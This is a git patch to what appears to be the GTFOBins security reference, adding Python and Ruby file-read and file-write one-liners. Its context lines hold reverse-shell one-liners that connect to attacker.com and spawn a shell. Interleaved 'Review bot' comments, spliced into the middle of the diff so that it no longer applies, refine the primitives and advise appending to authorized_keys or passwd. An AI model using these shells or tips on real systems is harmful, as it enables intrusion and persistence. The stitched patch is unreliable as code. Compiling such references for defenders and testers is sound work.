From ee57eeba90c7e0ab8b6f0f72d34f1a75d95a2425 Mon Sep 17 00:00:00 2001
From: Emilio Pinna
Date: Mon, 28 May 2018 18:25:55 +0100
Subject: [PATCH] Add read and write to python and ruby
---
 _gtfobins/python2.md | 4 ++++
 _gtfobins/python3.md | 4 ++++
 _gtfobins/ruby.md | 4 ++++
 3 files changed, 12 insertions(+)
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index 1b64190..d2cfa3d 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -28,6 +28,10 @@ functions:
 export RHOST=attacker.com
 export RPORT=12345
 python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
+ file-read:
+ - code: python2 -c 'open("file_to_read").read()'
+ file-write:
+ - code: python2 -c 'open("file_to_write","w+").write("data")'
 load-library:
 - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
 ---
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 9342130..3db6232 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -28,6 +28,10 @@ functions:
 export RHOST=attacker.com
 export RPORT=12345
 python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
+ file-read:
+ - code: python3 -c 'open("file_to_read").read()'
+ file-write:
+ - code: python3 -c 'open("file_to_write","w+").write("data")'
 load-library:
 - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
 ---
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index 8335338..0935dc3 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
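Review bot: The new python2 `file-read` one-liner reads the file but never emits its contents: under `python2 -c` the return value of `.read()` is discarded, so the command exits silently and the primitive is not actually demonstrated. The ruby entry in the same patch gets this right with `puts`; the python2 line should match, `python2 -c 'print(open("file_to_read").read())'`. On the `file-write` line, `"w+"` truncates the target before writing and the read-side of `+` is unused, so `"w"` is the honest mode, and anyone using this against a file they want to extend (authorized_keys, passwd) should be told to use `"a"` instead.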
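Review bot: The python3 `file-read` entry has the same gap as the python2 one: `open("file_to_read").read()` evaluated under `-c` prints nothing, so a reader copying the command sees no output and may conclude the technique does not work. Wrap it in print, `python3 -c 'print(open("file_to_read").read())'`, which also lines it up with the ruby entry's `puts File.read(...)`. The `file-write` line would read better as `"w"` rather than `"w+"`, since nothing is read back from the handle and `w+` still truncates; a note that `"a"` appends instead of clobbering would help practitioners targeting existing files.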
@@ -15,6 +15,10 @@ functions:
 export RHOST=attacker.com
 export RPORT=12345
 ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+ file-read:
+ - code: ruby -e 'puts File.read("file_to_read")'
+ file-write:
+ - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
 load-library:
 - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
 ---
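Review bot: The ruby `file-write` example opens a block just to call `write` once; the shorter idiom `ruby -e 'File.write("file_to_write", "data")'` does the same thing and closes the handle implicitly, which reads more like the one-line `File.read` entry above it. As written, `"w+"` truncates whatever is at `file_to_write` before the write, so the entry silently destroys the target's existing contents; if the intent includes appending to files like `authorized_keys`, mention `File.write(path, data, mode: "a")` or `"a"` as the mode.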